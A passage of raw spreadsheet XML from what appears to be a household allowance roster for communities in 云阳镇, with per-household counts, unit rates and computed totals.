        <v>2</v>
      </c>
      <c r="H1585" s="25">
        <v>325</v>
      </c>
      <c r="I1585" s="24">
        <f t="shared" si="24"/>
        <v>650</v>
      </c>
      <c r="J1585" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1585" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1586" customHeight="1" spans="1:11">
      <c r="A1586" s="23" t="s">
        <v>4266</v>
      </c>
      <c r="B1586" s="24" t="str">
        <f>B1585</f>
        <v>云阳镇</v>
      </c>
      <c r="C1586" s="24" t="str">
        <f>C1585</f>
        <v>小关社区</v>
      </c>
      <c r="D1586" s="24" t="s">
        <v>4267</v>
      </c>
      <c r="E1586" s="31" t="s">
        <v>4268</v>
      </c>
      <c r="F1586" s="24" t="str">
        <f>F1585</f>
        <v>4113210521</v>
      </c>
      <c r="G1586" s="24"/>
      <c r="H1586" s="24"/>
      <c r="I1586" s="24">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="J1586" s="24"/>
      <c r="K1586" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1587" customHeight="1" spans="1:11">
      <c r="A1587" s="23" t="s">
        <v>4269</v>
      </c>
      <c r="B1587" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1587" s="24" t="s">
        <v>4249</v>
      </c>
      <c r="D1587" s="24" t="s">
        <v>4270</v>
      </c>
      <c r="E1587" s="24" t="s">
        <v>3594</v>
      </c>
      <c r="F1587" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1587" s="24">
        <v>1</v>
      </c>
      <c r="H1587" s="25">
        <v>365</v>
      </c>
      <c r="I1587" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1587" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1587" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1588" customHeight="1" spans="1:11">
      <c r="A1588" s="23" t="s">
        <v>4271</v>
      </c>
      <c r="B1588" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1588" s="24" t="s">
        <v>4249</v>
      </c>
      <c r="D1588" s="24" t="s">
        <v>4272</v>
      </c>
      <c r="E1588" s="24" t="s">
        <v>3872</v>
      </c>
      <c r="F1588" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1588" s="24">
        <v>2</v>
      </c>
      <c r="H1588" s="25">
        <v>325</v>
      </c>
      <c r="I1588" s="24">
        <f t="shared" si="24"/>
        <v>650</v>
      </c>
      <c r="J1588" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1588" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1589" customHeight="1" spans="1:11">
      <c r="A1589" s="23" t="s">
        <v>4273</v>
      </c>
      <c r="B1589" s="24" t="str">
        <f>B1588</f>
        <v>云阳镇</v>
      </c>
      <c r="C1589" s="24" t="str">
        <f>C1588</f>
        <v>小关社区</v>
      </c>
      <c r="D1589" s="59" t="s">
        <v>4274</v>
      </c>
      <c r="E1589" s="59" t="s">
        <v>4275</v>
      </c>
      <c r="F1589" s="24" t="str">
        <f>F1588</f>
        <v>4113210521</v>
      </c>
      <c r="G1589" s="24"/>
      <c r="H1589" s="24"/>
      <c r="I1589" s="24">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="J1589" s="24"/>
      <c r="K1589" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1590" customHeight="1" spans="1:11">
      <c r="A1590" s="23" t="s">
        <v>4276</v>
      </c>
      <c r="B1590" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1590" s="24" t="s">
        <v>4249</v>
      </c>
      <c r="D1590" s="24" t="s">
        <v>4277</v>
      </c>
      <c r="E1590" s="24" t="s">
        <v>4117</v>
      </c>
      <c r="F1590" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1590" s="24">
        <v>3</v>
      </c>
      <c r="H1590" s="25">
        <v>290</v>
      </c>
      <c r="I1590" s="24">
        <f t="shared" si="24"/>
        <v>870</v>
      </c>
      <c r="J1590" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1590" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1591" customHeight="1" spans="1:11">
      <c r="A1591" s="23" t="s">
        <v>4278</v>
      </c>
      <c r="B1591" s="24" t="str">
        <f>B1590</f>
        <v>云阳镇</v>
      </c>
      <c r="C1591" s="24" t="str">
        <f>C1590</f>
        <v>小关社区</v>
      </c>
      <c r="D1591" s="43" t="s">
        <v>4279</v>
      </c>
      <c r="E1591" s="43" t="s">
        <v>4280</v>
      </c>
      <c r="F1591" s="24" t="str">
        <f>F1590</f>
        <v>4113210521</v>
      </c>
      <c r="G1591" s="24"/>
      <c r="H1591" s="24"/>
      <c r="I1591" s="24">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="J1591" s="24"/>
      <c r="K1591" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1592" customHeight="1" spans="1:11">
      <c r="A1592" s="23" t="s">
        <v>4281</v>
      </c>
      <c r="B1592" s="24" t="str">
        <f>B1591</f>
        <v>云阳镇</v>
      </c>
      <c r="C1592" s="24" t="str">
        <f>C1591</f>
        <v>小关社区</v>
      </c>
      <c r="D1592" s="43" t="s">
        <v>4282</v>
      </c>
      <c r="E1592" s="43" t="s">
        <v>2708</v>
      </c>
      <c r="F1592" s="24" t="str">
        <f>F1591</f>
        <v>4113210521</v>
      </c>
      <c r="G1592" s="24"/>
      <c r="H1592" s="24"/>
      <c r="I1592" s="24">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="J1592" s="24"/>
      <c r="K1592" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1593" customHeight="1" spans="1:11">
      <c r="A1593" s="23" t="s">
        <v>4283</v>
      </c>
      <c r="B1593" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1593" s="24" t="s">
        <v>4144</v>
      </c>
      <c r="D1593" s="24" t="s">
        <v>4284</v>
      </c>
      <c r="E1593" s="24" t="s">
        <v>4285</v>
      </c>
      <c r="F1593" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1593" s="24">
        <v>2</v>
      </c>
      <c r="H1593" s="25">
        <v>325</v>
      </c>
      <c r="I1593" s="24">
        <f t="shared" si="24"/>
        <v>650</v>
      </c>
      <c r="J1593" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1593" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1594" customHeight="1" spans="1:11">
      <c r="A1594" s="23" t="s">
        <v>4286</v>
      </c>
      <c r="B1594" s="24" t="str">
        <f>B1593</f>
        <v>云阳镇</v>
      </c>
      <c r="C1594" s="24" t="str">
        <f>C1593</f>
        <v>大关居委会</v>
      </c>
      <c r="D1594" s="23" t="s">
        <v>4287</v>
      </c>
      <c r="E1594" s="23" t="s">
        <v>4288</v>
      </c>
      <c r="F1594" s="24" t="str">
        <f>F1593</f>
        <v>4113210522</v>
      </c>
      <c r="G1594" s="24"/>
      <c r="H1594" s="24"/>
      <c r="I1594" s="24">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="J1594" s="24"/>
      <c r="K1594" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1595" customHeight="1" spans="1:11">
      <c r="A1595" s="23" t="s">
        <v>4289</v>
      </c>
      <c r="B1595" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1595" s="24" t="s">
        <v>4144</v>
      </c>
      <c r="D1595" s="24" t="s">
        <v>4290</v>
      </c>
      <c r="E1595" s="24" t="s">
        <v>4291</v>
      </c>
      <c r="F1595" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1595" s="24">
        <v>1</v>
      </c>
      <c r="H1595" s="25">
        <v>365</v>
      </c>
      <c r="I1595" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1595" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1595" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1596" customHeight="1" spans="1:11">
      <c r="A1596" s="23" t="s">
        <v>4292</v>
      </c>
      <c r="B1596" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1596" s="24" t="s">
        <v>4144</v>
      </c>
      <c r="D1596" s="24" t="s">
        <v>4293</v>
      </c>
      <c r="E1596" s="24" t="s">
        <v>3601</v>
      </c>
      <c r="F1596" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1596" s="24">
        <v>1</v>
      </c>
      <c r="H1596" s="25">
        <v>365</v>
      </c>
      <c r="I1596" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1596" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1596" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1597" customHeight="1" spans="1:11">
      <c r="A1597" s="23" t="s">
        <v>4294</v>
      </c>
      <c r="B1597" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1597" s="24" t="s">
        <v>4144</v>
      </c>
      <c r="D1597" s="24" t="s">
        <v>4295</v>
      </c>
      <c r="E1597" s="24" t="s">
        <v>4296</v>
      </c>
      <c r="F1597" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1597" s="24">
        <v>1</v>
      </c>
      <c r="H1597" s="25">
        <v>365</v>
      </c>
      <c r="I1597" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1597" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1597" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1598" customHeight="1" spans="1:11">
      <c r="A1598" s="23" t="s">
        <v>4297</v>
      </c>
      <c r="B1598" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1598" s="24" t="s">
        <v>4144</v>
      </c>
      <c r="D1598" s="24" t="s">
        <v>4298</v>
      </c>
      <c r="E1598" s="24" t="s">
        <v>4140</v>
      </c>
      <c r="F1598" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1598" s="24">
        <v>1</v>
      </c>
      <c r="H1598" s="25">
        <v>365</v>
      </c>
      <c r="I1598" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1598" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1598" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1599" customHeight="1" spans="1:11">
      <c r="A1599" s="23" t="s">
        <v>4299</v>
      </c>
      <c r="B1599" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1599" s="24" t="s">
        <v>4144</v>
      </c>
      <c r="D1599" s="24" t="s">
        <v>4300</v>
      </c>
      <c r="E1599" s="24" t="s">
        <v>2257</v>
      </c>
      <c r="F1599" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1599" s="24">
        <v>1</v>
      </c>
      <c r="H1599" s="25">
        <v>365</v>
      </c>
      <c r="I1599" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1599" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1599" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1600" customHeight="1" spans="1:11">
      <c r="A1600" s="23" t="s">
        <v>4301</v>
      </c>
      <c r="B1600" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1600" s="24" t="s">
        <v>4144</v>
      </c>
      <c r="D1600" s="24" t="s">
        <v>4302</v>
      </c>
      <c r="E1600" s="24" t="s">
        <v>3662</v>
      </c>
      <c r="F1600" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1600" s="24">
        <v>1</v>
      </c>
      <c r="H1600" s="25">
        <v>365</v>
      </c>
      <c r="I1600" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1600" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1600" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1601" customHeight="1" spans="1:11">
      <c r="A1601" s="23" t="s">
        <v>4303</v>
      </c>
      <c r="B1601" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1601" s="24" t="s">
        <v>4144</v>
      </c>
      <c r="D1601" s="24" t="s">
        <v>4304</v>
      </c>
      <c r="E1601" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F1601" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1601" s="24">
        <v>1</v>
      </c>
      <c r="H1601" s="25">
        <v>365</v>
      </c>
      <c r="I1601" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1601" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1601" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1602" customHeight="1" spans="1:11">
      <c r="A1602" s="23" t="s">
        <v>4305</v>
      </c>
      <c r="B1602" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1602" s="24" t="s">
        <v>4306</v>
      </c>
      <c r="D1602" s="24" t="s">
        <v>4307</v>
      </c>
      <c r="E1602" s="24" t="s">
        <v>3809</v>
      </c>
      <c r="F1602" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1602" s="24">
        <v>2</v>
      </c>
      <c r="H1602" s="25">
        <v>325</v>
      </c>
      <c r="I1602" s="24">
        <f t="shared" si="24"/>
        <v>650</v>
      </c>
      <c r="J1602" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1602" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1603" customHeight="1" spans="1:11">
      <c r="A1603" s="23" t="s">
        <v>4308</v>
      </c>
      <c r="B1603" s="24" t="str">
        <f>B1602</f>
        <v>云阳镇</v>
      </c>
      <c r="C1603" s="24" t="str">
        <f>C1602</f>
        <v>老城社区</v>
      </c>
      <c r="D1603" s="24" t="s">
        <v>4309</v>
      </c>
      <c r="E1603" s="23" t="s">
        <v>4310</v>
      </c>
      <c r="F1603" s="24" t="str">
        <f>F1602</f>
        <v>4113210523</v>
      </c>
      <c r="G1603" s="24"/>
      <c r="H1603" s="24"/>
      <c r="I1603" s="24">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="J1603" s="24"/>
      <c r="K1603" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1604" customHeight="1" spans="1:11">
      <c r="A1604" s="23" t="s">
        <v>4311</v>
      </c>
      <c r="B1604" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1604" s="24" t="s">
        <v>4306</v>
      </c>
      <c r="D1604" s="24" t="s">
        <v>4312</v>
      </c>
      <c r="E1604" s="24" t="s">
        <v>3598</v>
      </c>
      <c r="F1604" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1604" s="24">
        <v>3</v>
      </c>
      <c r="H1604" s="25">
        <v>290</v>
      </c>
      <c r="I1604" s="24">
        <f t="shared" ref="I1604:I1667" si="25">H1604*G1604</f>
        <v>870</v>
      </c>
      <c r="J1604" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1604" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1605" customHeight="1" spans="1:11">
      <c r="A1605" s="23" t="s">
        <v>4313</v>
      </c>
      <c r="B1605" s="24" t="str">
        <f>B1604</f>
        <v>云阳镇</v>
      </c>
      <c r="C1605" s="24" t="str">
        <f>C1604</f>
        <v>老城社区</v>
      </c>
      <c r="D1605" s="24" t="s">
        <v>4314</v>
      </c>
      <c r="E1605" s="23" t="s">
        <v>3922</v>
      </c>
      <c r="F1605" s="24" t="str">
        <f>F1604</f>
        <v>4113210523</v>
      </c>
      <c r="G1605" s="24"/>
      <c r="H1605" s="24"/>
      <c r="I1605" s="24">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="J1605" s="24"/>
      <c r="K1605" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1606" customHeight="1" spans="1:11">
      <c r="A1606" s="23" t="s">
        <v>4315</v>
      </c>
      <c r="B1606" s="24" t="str">
        <f>B1605</f>
        <v>云阳镇</v>
      </c>
      <c r="C1606" s="24" t="str">
        <f>C1605</f>
        <v>老城社区</v>
      </c>
      <c r="D1606" s="60" t="s">
        <v>4316</v>
      </c>
      <c r="E1606" s="23" t="s">
        <v>4317</v>
      </c>
      <c r="F1606" s="24" t="str">
        <f>F1605</f>
        <v>4113210523</v>
      </c>
      <c r="G1606" s="24"/>
      <c r="H1606" s="24"/>
      <c r="I1606" s="24">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="J1606" s="24"/>
      <c r="K1606" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1607" customHeight="1" spans="1:11">
      <c r="A1607" s="23" t="s">
        <v>4318</v>
      </c>
      <c r="B1607" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1607" s="24" t="s">
        <v>4306</v>
      </c>
      <c r="D1607" s="24" t="s">
        <v>4319</v>
      </c>
      <c r="E1607" s="24" t="s">
        <v>4320</v>
      </c>
      <c r="F1607" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1607" s="24">
        <v>1</v>
      </c>
      <c r="H1607" s="25">
        <v>365</v>
      </c>
      <c r="I1607" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1607" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1607" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1608" customHeight="1" spans="1:11">
      <c r="A1608" s="23" t="s">
        <v>4321</v>
      </c>
      <c r="B1608" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1608" s="24" t="s">
        <v>4306</v>
      </c>
      <c r="D1608" s="24" t="s">
        <v>4322</v>
      </c>
      <c r="E1608" s="24" t="s">
        <v>4323</v>
      </c>
      <c r="F1608" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1608" s="24">
        <v>1</v>
      </c>
      <c r="H1608" s="25">
        <v>365</v>
      </c>
      <c r="I1608" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1608" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1608" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1609" customHeight="1" spans="1:11">
      <c r="A1609" s="23" t="s">
        <v>4324</v>
      </c>
      <c r="B1609" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1609" s="24" t="s">
        <v>4306</v>
      </c>
      <c r="D1609" s="24" t="s">
        <v>4325</v>
      </c>
      <c r="E1609" s="24" t="s">
        <v>4326</v>
      </c>
      <c r="F1609" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1609" s="24">
        <v>1</v>
      </c>
      <c r="H1609" s="25">
        <v>365</v>
      </c>
      <c r="I1609" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1609" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1609" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1610" customHeight="1" spans="1:11">
      <c r="A1610" s="23" t="s">
        <v>4327</v>
      </c>
      <c r="B1610" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1610" s="24" t="s">
        <v>4306</v>
      </c>
      <c r="D1610" s="24" t="s">
        <v>4328</v>
      </c>
      <c r="E1610" s="24" t="s">
        <v>4329</v>
      </c>
      <c r="F1610" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1610" s="24">
        <v>1</v>
      </c>
      <c r="H1610" s="25">
        <v>365</v>
      </c>
      <c r="I1610" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1610" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1610" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1611" customHeight="1" spans="1:11">
      <c r="A1611" s="23" t="s">
        <v>4330</v>
      </c>
      <c r="B1611" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1611" s="24" t="s">
        <v>4306</v>
      </c>
      <c r="D1611" s="24" t="s">
        <v>4331</v>
      </c>
      <c r="E1611" s="24" t="s">
        <v>3673</v>
      </c>
      <c r="F1611" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1611" s="24">
        <v>2</v>
      </c>
      <c r="H1611" s="25">
        <v>325</v>
      </c>
      <c r="I1611" s="24">
        <f t="shared" si="25"/>
        <v>650</v>
      </c>
      <c r="J1611" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1611" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1612" customHeight="1" spans="1:11">
      <c r="A1612" s="23" t="s">
        <v>4332</v>
      </c>
      <c r="B1612" s="24" t="str">
        <f>B1611</f>
        <v>云阳镇</v>
      </c>
      <c r="C1612" s="24" t="str">
        <f>C1611</f>
        <v>老城社区</v>
      </c>
      <c r="D1612" s="30" t="s">
        <v>4333</v>
      </c>
      <c r="E1612" s="31" t="s">
        <v>4326</v>
      </c>
      <c r="F1612" s="24" t="str">
        <f>F1611</f>
        <v>4113210523</v>
      </c>
      <c r="G1612" s="24"/>
      <c r="H1612" s="24"/>
      <c r="I1612" s="24">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="J1612" s="24"/>
      <c r="K1612" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1613" customHeight="1" spans="1:11">
      <c r="A1613" s="23" t="s">
        <v>4334</v>
      </c>
      <c r="B1613" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1613" s="24" t="s">
        <v>4306</v>
      </c>
      <c r="D1613" s="24" t="s">
        <v>4335</v>
      </c>
      <c r="E1613" s="24" t="s">
        <v>4336</v>
      </c>
      <c r="F1613" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1613" s="24">
        <v>1</v>
      </c>
      <c r="H1613" s="25">
        <v>365</v>
      </c>
      <c r="I1613" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1613" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1613" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1614" customHeight="1" spans="1:11">
      <c r="A1614" s="23" t="s">
        <v>4337</v>
      </c>
      <c r="B1614" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1614" s="24" t="s">
        <v>4306</v>
      </c>
      <c r="D1614" s="24" t="s">
        <v>4338</v>
      </c>
      <c r="E1614" s="24" t="s">
        <v>4339</v>
      </c>
      <c r="F1614" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1614" s="24">
        <v>2</v>
      </c>
      <c r="H1614" s="25">
        <v>325</v>
      </c>
      <c r="I1614" s="24">
        <f t="shared" si="25"/>
        <v>650</v>
      </c>
      <c r="J1614" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1614" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1615" customHeight="1" spans="1:11">
      <c r="A1615" s="23" t="s">
        <v>4340</v>
      </c>
      <c r="B1615" s="24" t="str">
        <f>B1614</f>
        <v>云阳镇</v>
      </c>
      <c r="C1615" s="24" t="str">
        <f>C1614</f>
        <v>老城社区</v>
      </c>
      <c r="D1615" s="24" t="s">
        <v>4341</v>
      </c>
      <c r="E1615" s="23" t="s">
        <v>4342</v>
      </c>
      <c r="F1615" s="24" t="str">
        <f>F1614</f>
        <v>4113210523</v>
      </c>
      <c r="G1615" s="24"/>
      <c r="H1615" s="24"/>
      <c r="I1615" s="24">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="J1615" s="24"/>
      <c r="K1615" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1616" customHeight="1" spans="1:11">
      <c r="A1616" s="23" t="s">
        <v>4343</v>
      </c>
      <c r="B1616" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1616" s="24" t="s">
        <v>4306</v>
      </c>
      <c r="D1616" s="24" t="s">
        <v>4344</v>
      </c>
      <c r="E1616" s="24" t="s">
        <v>3912</v>
      </c>
      <c r="F1616" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1616" s="24">
        <v>1</v>
      </c>
      <c r="H1616" s="25">
        <v>365</v>
      </c>
      <c r="I1616" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1616" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1616" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1617" customHeight="1" spans="1:11">
      <c r="A1617" s="23" t="s">
        <v>4345</v>
      </c>
      <c r="B1617" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1617" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1617" s="24" t="s">
        <v>4347</v>
      </c>
      <c r="E1617" s="24" t="s">
        <v>4348</v>
      </c>
      <c r="F1617" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1617" s="24">
        <v>1</v>
      </c>
      <c r="H1617" s="25">
        <v>365</v>
      </c>
      <c r="I1617" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1617" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1617" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1618" customHeight="1" spans="1:11">
      <c r="A1618" s="23" t="s">
        <v>4349</v>
      </c>
      <c r="B1618" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1618" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1618" s="24" t="s">
        <v>4350</v>
      </c>
      <c r="E1618" s="24" t="s">
        <v>4351</v>
      </c>
      <c r="F1618" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1618" s="24">
        <v>2</v>
      </c>
      <c r="H1618" s="25">
        <v>325</v>
      </c>
      <c r="I1618" s="24">
        <f t="shared" si="25"/>
        <v>650</v>
      </c>
      <c r="J1618" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1618" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1619" customHeight="1" spans="1:11">
      <c r="A1619" s="23" t="s">
        <v>4352</v>
      </c>
      <c r="B1619" s="24" t="str">
        <f>B1618</f>
        <v>云阳镇</v>
      </c>
      <c r="C1619" s="24" t="str">
        <f>C1618</f>
        <v>云钢社区</v>
      </c>
      <c r="D1619" s="61" t="s">
        <v>4353</v>
      </c>
      <c r="E1619" s="61" t="s">
        <v>4354</v>
      </c>
      <c r="F1619" s="24" t="str">
        <f>F1618</f>
        <v>4113210599</v>
      </c>
      <c r="G1619" s="24"/>
      <c r="H1619" s="24"/>
      <c r="I1619" s="24">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="J1619" s="24"/>
      <c r="K1619" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1620" customHeight="1" spans="1:11">
      <c r="A1620" s="23" t="s">
        <v>4355</v>
      </c>
      <c r="B1620" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1620" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1620" s="24" t="s">
        <v>3971</v>
      </c>
      <c r="E1620" s="24" t="s">
        <v>4356</v>
      </c>
      <c r="F1620" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1620" s="24">
        <v>1</v>
      </c>
      <c r="H1620" s="25">
        <v>365</v>
      </c>
      <c r="I1620" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1620" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1620" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1621" customHeight="1" spans="1:11">
      <c r="A1621" s="23" t="s">
        <v>4357</v>
      </c>
      <c r="B1621" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1621" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1621" s="24" t="s">
        <v>4358</v>
      </c>
      <c r="E1621" s="24" t="s">
        <v>4359</v>
      </c>
      <c r="F1621" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1621" s="24">
        <v>1</v>
      </c>
      <c r="H1621" s="25">
        <v>365</v>
      </c>
      <c r="I1621" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1621" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1621" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1622" customHeight="1" spans="1:11">
      <c r="A1622" s="23" t="s">
        <v>4360</v>
      </c>
      <c r="B1622" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1622" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1622" s="24" t="s">
        <v>4361</v>
      </c>
      <c r="E1622" s="24" t="s">
        <v>4362</v>
      </c>
      <c r="F1622" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1622" s="24">
        <v>1</v>
      </c>
      <c r="H1622" s="25">
        <v>365</v>
      </c>
      <c r="I1622" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1622" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1622" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1623" customHeight="1" spans="1:11">
      <c r="A1623" s="23" t="s">
        <v>4363</v>
      </c>
      <c r="B1623" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1623" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1623" s="24" t="s">
        <v>1821</v>
      </c>
      <c r="E1623" s="24" t="s">
        <v>3707</v>
      </c>
      <c r="F1623" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1623" s="24">
        <v>1</v>
      </c>
      <c r="H1623" s="25">
        <v>365</v>
      </c>
      <c r="I1623" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1623" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1623" s="24" t="s">
        <v>225</v>
      </c>
    </row>
